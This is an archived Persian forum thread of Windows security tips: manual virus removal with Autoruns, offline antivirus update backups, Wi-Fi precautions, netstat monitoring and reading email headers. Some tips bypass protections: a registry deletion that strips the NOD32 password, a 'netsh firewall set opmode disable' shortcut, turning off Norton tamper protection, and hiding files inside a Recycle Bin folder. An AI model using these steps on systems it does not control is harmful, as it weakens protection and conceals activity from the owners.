توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : ترفند امنیت فقط در این تاپیک
Behzad AZ
06-30-2010, 08:09 AM
شاید برای شما نیز پیش آمده باشد که سیستمتان رفتار عجیبی را در پیش گرفته است که حس میکنید این مشکل ناشی از ویروس باشد. اما با وجود نصب آنتی ویروس به روز، آنتی ویروس واکنشی نشان نمی دهد. و یا اینکه ویروس باعث غیرفعال شدن آنتی ویروس شده است و یا اجازه نصب برنامههای امنیتی را نمیدهد. در این مواقع چارهای نیست و باید خود آستین بالا زده و ویروس را نابود کنیم. در این ترفند قصد داریم به معرفی کار با یک ابزار جانبی بپردازیم که از طریق آن میتوانید به هر آن چیزی که بر روی ویندوز شما در حال فعالیت است پی ببرید و در نتیجه رد ویروس را بگیرید.
در ابتدا نیازمند یک ابزار کمحجم و قابل حمل به نام Autoruns هستیم. کار این برنامه نمایش تمامی نرمافزارها، فایلهای Dll، Codecها و سایر فایلهای اجرایی ویندوز است.
ابتدا Autoruns را با حجم تقریبی 600 کیلوبایت از آدرس زیر در سایت مایکروسافت دانلود نمایید:
http://technet.microsoft.com/en-au/sysinternals/bb963902.aspx
پس از دانلود فایل، آن را از حالت فشرده خارج کرده و برنامه را با دو بار کلیک بر روی فایل autoruns.exe اجرا کنید.
روش استفاده از نرمافزار
پس از اجرای برنامه بر روی دکمه Agree کلیک کنید تا وارد محیط برنامه شوید.
این برنامه دارای چندین تب است که در هر تب فایلهای اجرا شده مربوط به هر مورد قابل مشاهده است.
در تب Everything تمامی برنامهها و فایلهای فعال قابل مشاهده هستند.
روش کار کلی نرمافزار به این صورت است که اگر میخواهید یک نرمافزار و یا فایل، تنها در راهاندازی مجدد سیستم اجرا نشود تیک کنار آن را بردارید. دقت کنید که در همان لحظه فعالیت برنامه متوقف نمیشود و پس از اولین Restart سیستم، فایل اجرا نخواهد شد. اما اگر میخواهید که فایل به هیچ وجه اجرا نشود و کاملا از لیست Autoruns پاک شود بر روی آن راست کلیک کرده و سپس Delete را انتخاب کنید.
شناسایی برنامههای مشکوک
برای پی بردن به برنامههای ویروسی و تفکیک آنها از برنامههای مربوط به ویندوز و برنامههای سالم دیگر، باید به قدر کافی آزمایش کرده باشید و تجربه بدست آورده باشید. اما در اینجا به ذکر چند نکته در مورد تشخیص برنامههای سالم از ناسالم میپردازیم:
1. اصولا برنامههایی که در ستونهای Publisher و Description دارای اطلاعاتی نباشند بسیار مشکوک به ویروس هستند، چرا که دارای هویت نیستند.
2. اگر نام برنامه برای شما آشنا بوده با اطمینان نمیشود گفت که ویروس نیست. در بیشتر مواقع ویروسها با نامهایی ظاهر میشوند که بخشی از تشکیلات ویندوز تصور میشوند، مانند Diskfix ،SearchHelper و... .
3. ویروسها معمولاً در تب Logon قرار میگیرند (اما نه همیشه!).
4. همواره به تاریخ ایجاد و تغییر فایلها که در Properties هر فایل در قسمت Modified درج میشود توجه کنید. اگر تاریخ ایجاد آن به چند روز پیش برگردد باید تا حد زیادی به آن مظنون شوید.
5. به مسیر فایل نیز نگاه کنید. در اکثر مواقع ویروسها در مسیر C:\WINDOWS و یا C:\WINDOWS\system32 ذخیره میشوند.
6. به آیکون فایل در سمت چپ نام برنامه نیز نگاه کنید. ویروسها معمولا دارای آیکونهای ویندوزی آشنا هستند.
در پایان اگر هنوز مشکوک هستید بر روی آیتم مورد نظر در نرمافزار راست کلیک کرده و بر روی گزینه Search Online کلیک کنید تا هویت فایل به صورت آنلاین از طریق اینترنت بررسی شود.
پاکسازی ویروس
وقتی شما مطمئن شدید که مظنونتان ویروس است به ترتیب زیر عمل کنید:
1. آیتم مورد نظر را در نرمافزار Autoruns پاک (Delete) کنید.
2. پروسههای مربوطه را در Task Manager با فشردن کلید End Proccess قطع کنید.
3. فایلهای EXE و یا DLL که مسیرشان را قبلاً مشاهده کردید، پیدا و پاک کنید و یا به صورتی قرنطینه کنید که نتوانند به صورت خودکار اجرا شوند.
4. سیستم را Restart کنید.
پس از Restart سیستم موارد زیر را چک کنید:
1. در نرمافزار Autoruns ببینید که آیتمهای مورد نظر دوباره برگشتند یا خیر.
2. در Task Manager ببینید پروسههای مربوط به ویروس وجود دارند یا نه.
3. آیا رفتارهایی که شما را به ویروسی بودن سیستمتان مظنون کرد هنوز وجود دارند؟ (مانند ارورهای مختلف).
اگر پاسخ سوالهای بالا منفی باشد باید خوشحال باشید که خودتان بدون آنتی ویروس سیستمتان را پاکسازی کردید!
نکتهای مهم
این آموزش شاید برای همه افراد کارساز نباشد و کاربران حرفهای هستند که با صبر و حوصله و کسب تجربه کافی به انجام مراحل میپردازند. باید توجه داشته باشید که در بعضی مواقع پاکسازی ویروسها سختتر از آنچه هست که گفته شد و احتمالاً مجبور میشوید چندین بار مراحل بالا را تکرار کرده و هر بار با دقت بیشتری در مورد آیتمهای مظنون خود تحقیق کنید. یا در بعضی مواقع با پاک کردن آیتم در Autoruns و یا قطع کردن پروسه ویروس، دوباره پروسه ساخته میشود و یا فایل ویروس به راحتی پاک نمیشود و... . که اصولاً در این زمانها مجبوریم سختگیرانهتر برخورد کنیم و پروسههای خود ویندوز مانند explorer.exe را ببندیم تا کارمان تمام شود. با کمی آزمون و خطا میتوانید به هدفتان برسید.
Behzad AZ
06-30-2010, 08:10 AM
شرکت Symantec یکی از قدیمیترین شرکتها در زمینه تولید نرمافزارهای امنیتی است که در این میان سه نرمافزار Norton Internet Security ،Norton Antivirus و Norton 360 از محبوبیت زیادی در نزد کاربران برخوردار هستند. این نرمافزارهای امنیتی نیز به مانند سایر برنامه ها، امکان بهروزرسانی یا آپدیت پایگاه اطلاعاتی خود را دارا هستند. اما این کار به صورت آنلاین و با اتصال به اینترنت قابل انجام است. شاید شما نیازمند این باشید که عملیات بهروزرسانی این نرمافزارها را به صورت آفلاین و بدون اتصال به اینترنت صورت دهید. همچنین علاوه بر آن از آپدیتهایی که تاکنون انجام دادهاید پشتیبان تهیه کنید تا از آنها پس از نصب مجدد ویندوز یا جهت استفاده در یک کامپیوتر دیگر استفاده کنید. در این ترفند به بررسی نحوه پشتیبانگیری از آپدیتهای محصولات امنیتی Norton و آپدیت آفلاین آنها خواهیم پرداخت.
ابتدا پیش از هر کاری اطمینان پیدا کنید در ویندوز شما، قابلیت نمایش فایلهای مخفی فعال است. بدین منظور از منوی Start به Control Panel و سپس Folder Options بروید. در پنجره Folder Options به تب View مراجعه کنید و تیک گزینه Show hidden files, folders, and drives را بزنید و بر روی دکمه OK کلیک کنید.
حال در صورتی که از ویندوز ویستا یا 7 استفاده میکنید از طریق My Computer به مسیر زیر بروید:
C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_17.5.0.127
و اگر از ویندوز XP استفاده میکنید به مسیر زیر بروید:
C:\Documents and Settings\All Users\Application Data\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_17.5.0.127
دقت کنید:
* در مسیر بالا درایو C به عنوان درایوی که ویندوز در آن نصب شده، فرض شده است.
* عبارت NIS مربوط به Norton Internet Security است و میتواند بسته به برنامه نصب شده در ویندوز شما متغیر باشد. به عنوان مثال اگر Norton Antivirus نصب شده باشد به NAV و اگر Norton 360 نصب شده باشد به N360 تغییر نام خواهد داد.
* عبارت 17.5.0.127 مربوط به نسخه نصب شده از برنامه است و میتواند متغیر باشد.
پس از ورود به این مسیر، فولدری به نام Definitions به چشم میخورد. این فولدر حاوی کلیه آپدیتهای دانلود شده از اینترنت است. این فولدر را Copy کرده و آن را در مسیری دلخواه به عنوان پشتیبان آپدیت ها Paste نمایید.
بدین ترتیب میتوانید از آپدیتهای نرمافزارهای نورتون بکاپ تهیه کنید.
اما جهت آپدیت آفلاین نرمافزار:
ابتدا برنامه را باز کنید.
سپس به Settings و Miscellaneous Settings مراجعه کنید.
اکنون گزینه Norton Product Tamper Protection را یافته و آن را بر روی Off تنظیم کنید.
حال میتوانید پوشه Definitions که از آن پشتیبان تهیه کردید را در همان مسیر بالا در ویندوزی که آنتی ویروس آن آپدیت نیست، بدون مشاهده هرگونه پیغام خطا کپی کنید.
در پایان مجدد Norton Product Tamper Protection را به حالت اولیه بازگردانید و یک بار Run LiveUpdate را اجرا کنید تا اطلاعات نرمافزار به روز رسانی گردد.
با این کار نورتون را به صورت آفلاین آپدیت کردهاید.
Behzad AZ
06-30-2010, 08:11 AM
همواره یکی از دغدغههای اصلی کاربران، گرفتن پشتیبان یا به اصطلاح Backup از بهروزرسانیها یا آپدیتهای آنتی ویروس مورد استفاده بوده است. برای این کار نیز ترفندها و نرم افزارهای جانبی مختلفی ارائه شده است. اما در صورتی که از آنتی ویروس محبوب Nod32 استفاده میکنید قصد داریم به معرفی نحوه ساخت یک میانبر برای پشتیبانگیری سریع از آپدیتهای این آنتی ویروس بپردازیم. قطعاً ساده تر و سریع تر از این روش نمیتوانید از آپدیتهای آنتی ویروس Nod32 پشتیبان تهیه کنید تا در مواقع لزوم، آنتی ویروس خود را با استفاده از این آپدیتها به صورت آفلاین، آپدیت نمایید.
ابتدا لازم است بدانید که فایلهای آپدیت ESET Smart Security در ویندوز XP در مسیر زیر:
Documents and Settings\All Users\Application Data\ESET\ESET Smart Security\Updfiles
و در ویندوز ویستا و 7 در مسیر زیر ذخیره میگردد:
ProgramData\ESET\ESET Smart Security\Updfiles
همچنین فایلهای آپدیت ESET NOD32 Antivirus در ویندوز XP و همچنین ویستا و 7 به ترتیب در مسیرهای زیر ذخیره میگردد:
Documents and Settings\All Users\Application Data\ESET\ESET NOD32 Antivirus\Updfiles
ProgramData\ESET\ESET NOD32 Antivirus\Updfiles
در نتیجه شما برای پشتیبانگیری از آپدیتهای آنتی ویروس کافی است از فولدر Updfiles یک کپی تهیه کنید.
اما جهت ساخت یک میانبر برای پشتیبانگیری سریع از آپدیتهای این آنتی ویروس:
ابتدا برنامه Notepad ویندوز را اجرا نمایید. برای این کار از منوی Start به All Programs و سپس Accessories بروید و بر روی Notepad کلیک کنید.
حال کد زیر را عیناً Copy کرده و در محیط Paste ،Notepad نمایید:
@echo off
#www.Tarfandestan.com
xcopy "%PROGRAMDATA%\ESET\ESET Smart Security\Updfiles\*.nup" "C:\Nod32Update\" /y
xcopy "%PROGRAMDATA%\ESET\ESET Smart Security\Updfiles\*.ver" "C:\Nod32Update\" /y
xcopy "%AllUsersProfile%\application data\ESET\ESET Smart Security\Updfiles\*.nup" "C:\Nod32Update\" /y
xcopy "%AllUsersProfile%\application data\ESET\ESET Smart Security\Updfiles\*.ver" "C:\Nod32Update\" /y
xcopy "%programfiles%\ESET\ESET Smart Security\*.dat" "C:\Nod32Update" /y
پس از کپی کردن کد، از منوی File بر روی Save as کلیک کنید. سپس فایل را با نام دلخواه و پسوند bat. و در محلی به دلخواه خود ذخیره کنید (به عنوان مثال نام آن را Tarfandestan-Backup.bat قرار دهید و فایل را جهت دسترسی سریع در محیط دسکتاپ ذخیره کنید).
در مرحله بعد، به محلی که این فایل (Tarfandestan-Backup.bat) را ذخیره کردهاید بروید.
بر روی فایل دوبار کلیک نمایید. خواهید دید که پنجره جدیدی باز میشود. پس از ثابت شدن پنجره، کلیدی را فشار دهید تا پنجره بسته شود.
اکنون به درایو C مراجعه کنید. خواهید دید که یک پوشه جدید به نام Nod32Update به چشم میخورد.
کلیه محتویات پوشه Updfiles که شامل آپدیتهای آنتی ویروس بود هم اکنون در پوشه Nod32Update ذخیره شده است.
شما به همین سادگی و در هر زمانی میتوانید با دوبار کلیک بر روی فایلی که با فرمت bat ساختهاید از آپدیتهای آنتی ویروس پشتیبان تهیه کنید.
برای استفاده از این آپدیتها و بهروزرسانی آنتی ویروس در حالت آفلاین:
همانند روش بالا در محیط Notepad یک فایل با پسوند bat بسازید و به فرض مثال نام آن را Tarfandestan-Replace.bat قرار دهید. محتویات این فایل بایستی به شرح زیر باشد:
@echo off
#Tarfandestan.com
replace "*.nup" "%PROGRAMDATA%\ESET\ESET Smart Security\Updfiles\"
replace "*.ver" "%PROGRAMDATA%\ESET\ESET Smart Security\Updfiles\"
replace "*.nup" "%AllUsersProfile%\application data\ESET\ESET Smart Security\Updfiles\"
replace "*.ver" "%AllUsersProfile%\application data\ESET\ESET Smart Security\Updfiles\"
replace "*.dat" "%programfiles%\ESET\ESET Smart Security"
این فایل را در پوشه Nod32Update کپی کنید. با اجرای این فایل، محتویات پوشه Nod32Update مجدد به محل ذخیره آپدیتهای برنامه منتقل میشود.
نکته مهم: به این نکته مهم دقت نمایید که کد فوق مخصوص نرم افزار ESET Smart Security هستند. در صورتی که شما از ESET NOD32 Antivirus استفاده میکنید بایستی به جای عبارت ESET Smart Security، عبارت ESET NOD32 Antivirus را در کدهای فوق جایگزین نمایید.
در نهایت نیز یک بار سیستم را Restart کنید. سپس با اتصال به اینترنت و وارد کردن یوزرنیم و پسورد، آنتی ویروس را یک بار Update کنید. حجم آپدیتها بسیار ناچیز خواهد بود چرا که آپدیتها بر روی هارد با انجام عمل فوق ذخیره شده است.
این ترفند بر روی نسخههای 3 و 4 این آنتی ویروس آزمایش شده است.
Behzad AZ
06-30-2010, 08:11 AM
به طور کلی روشهای متعددی برای مخفی نمودن فایلها و فولدرها و خارج کردن آنها از دید و دسترس دیگران وجود دارد. ترفندهای مختلفی تاکنون در ترفندستان بدین منظور منتشر شده است. همچنین نرم افزارها و برنامههای جانبی کوچک و بزرگی نیز بدین منظور ساخته شدهاند. اما در این ترفند قصد داریم به معرفی یک روش جدید، ابتکاری و پیشرفته بپردازیم که باعث مخفیسازی فایلها و فولدرها با درجه امنیت بالا میگردد. با بهرهگیری از این ترفند میتوانید امنیت و اختفای فایلها و فولدرهای خود را کاملاً تضمین کنید.
برای این کار:
پیش از هر کاری لازم است قابلیت نمایش دیدن فایلهای مخفی و فایلهای مخفی سیستمی را در محیط ویندوز فعال کنید. بدین منظور از منوی Start به Control Panel بروید. بر روی Folder Options دوبار کلیک کنید و در پنجره باز شده به تب View بروید. اکنون تیک گزینه Show hidden files, folders, and drives را بزنید و تیک گزینه Hide protected operating system files را بردارید (در صورت مشاهده پیغام، Yes بزنید). در پایان بر روی دکمه OK کلیک نمایید.
اکنون نیازمند یک برنامه جانبی به نام Attribute Changer هستید. کار این نرم افزار کم حجم و رایگان، مخفیسازی فایلها نیست (ترفندستان) بلکه تغییر ویژگیهای فولدرها در محیط ویندوز است. ما قصد داریم از این کارایی نرم افزار، جهت استفاده از این ترفند مخفیسازی استفاده کنیم.
آخرین نسخه این نرم افزار را به طور مستقیم از لینک زیر دانلود کنید:
http://www.tarfandestan.com/files/AC-Tarfandestan.com.exe (http://www.tarfandestan.com/files/AC-Tarfandestan.com.exe)
پس از دانلود فایل، برنامه را نصب نمایید.
در قدم بعدی بایستی اقدام به خالی کردن محتویات Recycle Bin یا سطل آشغال ویندوز کنید. بدین منظور بر روی آیکن Recycle Bin در صفحه دسکتاپ راست کلیک کرده و Empty Recycle Bin را انتخاب نموده و Yes بزنید تا محتویات آن خالی شوید.
حال پنجره My Computer یا Computer را باز نموده و به دلخواه وارد یکی از درایوهای ویندوز (به عنوان مثال درایو C) شوید.
اکنون در صورتی که فرمت درایو شما:
1- FAT32 باشد در ریشه درایو فولدری به نام Recycled به چشم میخورد. آیکن این فولدر شبیه به سطل آشغال است.
2- NTFS باشد در ریشه درایو فولدری به نام RECYCLER قرار دارد. شما بایستی ابتدا وارد این فولدر شوید. در درون فولدر RECYCLER، یک یا بیش از یک فولدر با آیکن سطل آشغال وجود دارد که نامی طولانی با ترکیب حرف و عدد دارد (به عنوان مثال S-1-5-21-1220945662-573735546-1801674531-500).
شما بایستی این فولدر که آیکن آن سطل آشغال است (Recycled یا آن فولدری که نام طولانی دارد) را Copy کرده و در محلی دلخواه (به عنوان مثال صفحه دسکتاپ) Paste نمایید. نام این فولدر جدید کپی شده که همچنان آیکن سطل آشغال دارد را در این ترفند به عنوان مثال Tarfandestan قرار میدهیم.
در گام بعدی بر روی فولدر Tarfandestan راست کلیک کرده و گزینه Change Attributes (که پس از نصب برنامه Attribute Changer اضافه شده است) را انتخاب کنید.
در پنجره باز شده، تیک گزینه System را بردارید (ترفندستان) و بر روی دکمه OK کلیک نمایید.
خواهید دید که آیکن فولدر از سطل آشغال به یک فولدر معمولی تغییر خواهد کرد.
حالا وارد فولدر Tarfandestan شوید. اکنون فایلها و فولدرهایی که قصد دارید مخفی شوند را Cut کرده و به داخل این فولدر Paste کنید.
پس از Paste کردن فایلها و فولدرهای مورد نظر به فولدر Tarfandestan، مجدد بر روی این فولدر راست کلیک کرده و Change Attributes را انتخاب کنید. حال تیک گزینه System را بزنید (دقت کنید مربع آن را پر نکنید، بلکه تیک آن را بزنید). سپس بر روی دکمه OK کلیک کنید.
خواهید دید که فولدر مجدداً به یک سطل آشغال تغییر ماهیت داده است.
اکنون در صورتی که وارد فولدر Tarfandestan شوید خواهید دید که اثری از فایلها و فولدرهایی که به داخل آن Paste کرده بودید وجود ندارد! حتی این فایلها و فولدرها با قابلیت Search ویندوز نیز نمایش داده نمیشوند.
برای این که این فایلهای ناپدید شده را مجدداً بازیابی کنید، کافی است همان مراحل بالا را طی کنید. یعنی بر روی فولدر Tarfandestan راست کلیک کرده و Change Attributes را انتخاب کنید و سپس تیک System را بزنید و OK کنید. با وارد شدن به فولدر، فایلهای مخفی شده پدیدار میشوند. برای مخفیسازی مجدد نیز کافی است تیک System را دوباره بزنید.
لازم است به ذکر است این ترفند بر روی کلیه نسخههای ویندوز قابل انجام است. علاوه بر آن در صورتی که این فولدر به هر کامپیوتر دیگری که سیستم عامل ویندوز داشته باشد منتقل شود باز هم محتویات آن ناپیدا خواهد بود. این بدین معنی است که در صورتی که نرم افزار Attribute Changer را از روی ویندوز پاک کنید باز هم فایلهای داخل آن فولدر مخفی خواهد بود. در نتیجه در صورتی که اختفای فایلها خیلی برایتان اهمیت دارید میتوانید نرم افزار Attribute Changer را از روی ویندوز پاک کنید، سپس هر زمان که نیاز به بازیابی فایلها داشتید برنامه را نصب کنید و به روشی که در بالا توضیح داده شد تیک گزینه System را بردارید تا فایلها پدیدار شوند.
Behzad AZ
06-30-2010, 08:11 AM
آنتی ویروس NOD32 را میتوان یکی از محبوبترین و پرطرفدارترین آنتی ویروسهای مورد استفاده کاربران دانست. این آنتی ویروس در عین سهولت استفاده دارای امکانات و تواناییهای زیادی است. یکی از امکاناتی که NOD32 در اختیار کاربر قرار میدهد امکان تنظیم یک پسورد بر روی آن است. به طوری که جهت استفاده از آنتی ویروس و تغییر تنظیمات آن حتماً بایستی رمز عبور از پیش تعیین شده را وارد کرد. اما ممکن است به هر دلیلی این رمز عبور را فراموش یا گم کرده باشید. در این حالت حتی امکان پاک کردن آنتی ویروس نیز وجود ندارد. در این ترفند قصد داریم نحوه پاک کردن رمز عبور تنظیم شده بر روی آنتی ویروس NOD32 را برای شما بازگو نماییم.
بدین منظور:
ابتدا بایستی ویندوز را در حالت Safe Mode بالا بیاورید (برای این کار پس از روشن شدن سیستم به طور متوالی کلید F8 را بزنید و پس از پدیدار شدن منوی Windows Advanced Options، در میان گزینههای موجود Safe Mode را انتخاب کنید).
پس از ورود به محیط ویندوز در این حالت، از منوی Start بر روی Run کلیک نمایید و عبارت regedit را وارد کرده و Enter بزنید. در صورت استفاده از ویندوز ویستا یا 7، پس از کلیک بر روی منوی Start بلافاصله عبارت regedit را وارد نمایید و Enter بزنید تا وارد محیط ویرایشگر رجیستری ویندوز شوید.
اکنون در رجیستری به مسیر زیر بروید:
HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESETSecurity\Curr entVersion\Info
حال بر روی کلید PackageID راست کلیک کرده و Delete را انتخاب کنید. سپس بر روی دکمه Yes کلیک کنید.
کار تمام است و پسورد تنظیم شده بر روی نرم افزار پاک شده است.
کافی است ویندوز را در حالت معمولی بالا آورده و نتیجه را مشاهده کنید.
لازم به ذکر است در نسخههای قدیمیتر این آنتی ویروس این کلید در مسیر زیر قرار گرفته است که مجدد بایستی به روش بالا حذف شود:
HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersio n\Info
Behzad AZ
06-30-2010, 08:12 AM
حتماً شما نیز با Firewall یا دیوار آتشین موجود در ویندوز XP و ویستا آشنایی دارید. وظیفه اصلی این Firewall در درجه اول تأمین امنیت سیستم شما در برابر حملات خارجی به ویندوز است. اما این قابلیت همواره تأثیر مثبت ندارد و گاهی لازم میشود که آن را غیرفعال نماییم. جهت فعال سازی و غیرفعال سازی دیوار آتشین در ویندوز بایستی ابتدا به Control Panel و سپس Windows Firewall رفته و آن را فعال کنیم که این راه تا حدودی طولانی است. هم اکنون قصد داریم روشی میانبر از طریق ساخت Shortcut در ویندوز جهت فعال و غیرفعال نمودن Firewall برای شما بازگو کنیم که با بهره گیری از آن میتوانید تنها با یک دوبار کلیک بر روی آیکون مربوطه بر روی دسکتاپ دیوار آتشین را فعال نمایید و یا بلعکس.
ابتدا جهت ساخت یک Shortcut برای غیرفعال سازی دیوار آتشین:
بر روی فضای خالی از دسکتاپ راست کلیک نموده و از New گزینه Shortcut را انتخاب کنید.
در پنجره باز شده دستور زیر را وارد نموده و دکمه Next را بزنید:
netsh firewall set opmode disable
سپس نامی همانند Disable Firewall یا هر عنوان دلخواه دیگری برای آن انتخاب نمایید و بر روی دکمه Next کلیک کنید تا فایل میانبر ساخته شود.
اکنون اگر بر روی فایل ساخته شده دوبار کلیک کنید ابتدا پنجره ای سیاه رنگ باز و بسته میشود، سپس تغییر اعمال میگردد.
جهت فعال نمودن دیوار آتشین نیز به همانند روش بالا یک Shortcut جدید بسازید.
در مرحله اول دستور زیر را در آن وارد کنید:
netsh firewall set opmode enable
و نام آن را Enable Firewall بگذارید.
اکنون با دوبار کلیک بر روی این فایل جدید دیوار آتشین فعال میگردد.
جهت اطمینان از این موضوع نیز میتوانید به Control Panel > Windows Firewall مراجعه کنید و ببینید گزینه فعال سازی Firewall بر روی On یا Off تنظیم شده است.
Behzad AZ
06-30-2010, 08:12 AM
شبکه های Wireless یا بی*سیم مدت زمانی است که در کشور ما روند رو به رشدی داشته است. در حال حاضر در دانشگاه ها، فرودگاه ها، مراکز تجاری و اماکنی نظیر آنها دسترسی به اینترنت از طریق شبکه Wireless امکان پذیر است. اما نکته ای که وجود دارد این است که اگر ایجاد به یک شبکه بی*سیم برای همه امکان پذیر است بنابراین استفاده از آن برای مجرمان و خلافکاران نیز مجاز می*باشد! پس شما به عنوان یک کاربر در این زمان نبایستی ایمنی سیستم خود را فراموش کنید. یکی از ترفندهای هکرها این است که یک سرور دروغین ایجاد کرده و باعث میشوند شما به جای اتصال به سرور اصلی شبکه ناآگاهانه به کامپیوتر هکر که نقش سرور را ایفا میکند متصل شوید! به همین سادگی خودتان باعث شده اید هکر بتواند به سادگی به کامپیوتر یا لپتاپ شما نفوذ کرده و سوء استفاده نماید. برای جلوگیری از این مشکلات چه باید کرد؟ در این ترفند به معرفی اقدامات احتیاطی به هنگام اتصال به شبکه Wireless میپردازیم.
هیچگاه ناآگاهانه آن*لاین نشوید
اگر نیازی به اینترنت ندارید، اتصال Wi-fi دستگاه خود را قطع نمایید و علاوه بر آن همواره قابلیت اتصال اتوماتیک به شبکه ها در سیستم خود غیر فعال کنید. این کار عمر باتری را نیز بیشتر می*کند.
از شبکه مناسب و درست استفاده کنید
وقتی به شبکه بی*سیم وصل می*شوید، ویندوز SSIDهای (Service set Identifiers) تمام شبکه*های این مجموعه و محدوده را به شما نشان می*دهد.
همچنین اطمینان حاصل کنید که به شبکه درست وصل شده*اید، برای اینکار کافی است از متصدی مربوطه در محل نام صحیح کانکشن اصلی شبکه را پرس و جو نمایید. در صورت مشاهده کانکشن های مشکوک حتماً مراتب را به مسئولان گزارش دهید.
به اشتراک گذاری پرینتر و فایل خود را قطع نمایید
این کار را حتماً صورت دهید ؛
در ویندوز XP، از منوی Start وارد My Network Places شوید. در پنجره Network Connections بر روی شبکه راست کلیک کرده و Properties را انتخاب نمایید. در پنجره محاوره پایانی در قسمت General، گزینه Client for Microsoft Networks and File and Printer Sharing for Microsoft Networks را از حالت انتخاب درآورید و سپس بر روی OK کلیک کنید.
در ویندوز ویستا قابلیت جالبی نهفته است که خود ویندوز در صورت تشخیص نا امنی شبکه، به طور خودکار حالت به اشتراک*گذاری را لغو و این ویژگی را خاموش و غیرفعال می*سازد. جهت کنترل و تغییر این حالت از این روش پیروی نمایید: ابتدا از منوی Start وارد Network شوید، سپس بر روی عبارت Network and Sharing Center را کلیک کنید، اگر کنار نام شبکه عبارت Public network به معنای شبکه عمومی ظاهر شد و شما به شبکه عمومی وصل شدید، فقط باید این پنجره را ببندید چون در معرض دید قرار گرفته*اید. در غیر این صورت روی کلید Customize را از روی نام شبکه کلیک کنید. Public را انتخاب کرده و روی کلمه Next و سپس روی Close کلیک کنید.
کاری که انجام میدهید
دقت کنید از طریق اتصال به این شبکه های عمومی هرگز خرید اینترنتی نکنید، از عملیات بانکی آن*لاین استفاده ننمایید، اطلاعات حساس و مهم را با اتصال روی اینترنت عمومی ثبت نکنید و حتی المقدور از کلمات عبور استفاده نکنید.
Behzad AZ
06-30-2010, 08:12 AM
یکی از مواردی که در حوزه امنیت شبکه و اینترنت بسیاری از کاربران حتی کاربران حرفه ای را نیز بسیار تهدید میکند فعالیت های اینترنتی ناخواسته ای است که در محیط ویندوز انجام میگیرد. این فعالیت ها ممکن است چه از طریق نرم افزارهای مختلف نصب شده و چه از طریق بدافزارهایی (Malware) که ممکن است بر روی سیستم شما در حال اجرا باشد و به طور مخفیانه جاسوسی سیستم را بکند صورت بگیرد. به عبارتی دیگر، ممکن است به این موضوع دقت کرده باشید که در هنگام اتصال به اینترنت ، اگر هیچ فعالیتی نظیر باز کردن صفجه وب توسط مرورگر انجام ندهید ، در پنجره Status مربوط به کانکشن اینترنت شما و در قسمت Activity مقدار Send و Receive باز هم تغییر خواهد کرد. این بدین معناست که پس از اتصال شما به اینترنت همواره در پشت پرده ارتباطات پنهانی در میان ویندوز و اینترنت برقرار است. این ارتباطات مخفی میتواند گاهی انقدر مضر باشد که باعث اشغال زیادی از پهنای باند اینترنت شما گردد. هم اکنون قصد داریم ترفندی را بازگو کنیم که با بهره گیری از آن میتوانید کلیه ارتباطات جاری انجام شده میان ویندوز و اینترنت توسط نرم افزارهای نصب شده را به شکل ریز شده و دقیق مشاهده کنید و در صورت لزوم اقدام به موقعی در جهت حل آن صورت دهید.
بدین منظور:
از منوی Start وارد Run شوید.
عبارت cmd را وارد کرده و Enter بزنید تا وارد محیط Command Prompt شوید.
سپس دستور زیر را وارد نموده و Enter بزنید (به دو فاصله Space تایپ شده در میان دستور نیز دقت کنید):
netstat -b 5
بلافاصله پس از این کار کلیه کانکشن های جاری توسط نرم افزارهای موجود در ویندوز با ذکر نام هر یک و همچنین پورت مورد استفاده و مسیری که به آن متصل شده است برای شما لیست میشود.
این لیست هر 5 ثانیه به روز میگردد.
در روش فوق اندکی اطلاعات به دلیل به روز رسانی سریع ممکن است قابل فهم نباشد.
برای حل این مشکل دستور زیر را در CMD وارد کنید:
netstat -b 5 > tarfandestan.txt
سپس در زمانی به عنوان مثال حدود 5 دقیقه صبر کنید و سپس کلیدهای ترکیبی Ctrl+C بزنید.
اکنون عبارت tarfandestan.txt را مستقیمأ در Run وارد کرده و Enter بزنید.
آمار اتصالات در آن بازه 5 دقیقه ای در یک فایل Notepad به شکلی دقیق قابل مشاهده است.
در پایان در صورت مشاهده هرگونه ارتباط غیرمنطقی یا ناخواسته در میان ارتباطات اینترنتی ، میتوانید علیه نرم افزار مربوطه اقدامات لازم نظیر پاک کردن یا تغییر تنظیمات برنامه را انجام دهید.
Behzad AZ
06-30-2010, 08:12 AM
روزانه صدها ایمیل خواسته و ناخواسته وارد صندوق نامه های الکترونیکی شما میشود که فرستنده آن ها برایتان ناشناخته است و شما کنجکاو می شوید که ببینید این ایمیل از چه مسیری برایتان ارسال شد ه است. اولین قدم برای رد گیری یک ایمیل یافتن Header یا همان سر برگ ایمیل در یافتی است. در واقع این سربرگ ها برای این است که به شما نشان دهد ایمیل دریافتی از کجا و در طی چه مسیری به دست شما رسیده است که به طور معمول این سر برگ ها To ، From و Subject را نشان می دهد. اما چیز های بیشتری در سر برگ وجود دارد.در این ترفند شما را به سفری برای رد گیری ایمیل های صندوق پستی خود می بریم و این راه فقط در داخل صندوق پستی شما میسر است.
1- در Gmail : ابتدا وارد Inbox ایمیل خود در Gmail شوید. سپس وارد ایمیل دریافتی شده و سپس بر روی فلش کوچک رو به پایین در بالای متن ایمیل و در کنار تاریخ ایمیل و دکمه Reply کلیک کنید. در منوی کوچک باز شده ، Show Orginal را انتخاب کنید. در پنجره جدید شما ریز اطلاعات ایمیل دریافتی را خواهید داشت.
2- در Hotmail یا Live : وارد صندوق پستی ایمیل خود شوید و Inbox را انتخاب کنید. بر روی ایمیل مورد نظر خود راست کلیک کرده و View message source را انتخاب کنید. دقت کنید ایمیل را باز نکنید بلکه بر روی آن راست کلیک کنید. لازم به ذکر است این کار فقط در مرورگر IE امکان پذیر است.
3- در Yahoo Maill: وارد Inbox خود در یاهو شده و سپس وارد ایمیلی که قصد مشاهده سربرگ های کامل آن را دارید بشوید. سپس در پایین متن ایمیل خود عبارت Full Headers را بیابید و بر روی آن کلیک کنید.
Behzad AZ
06-30-2010, 08:13 AM
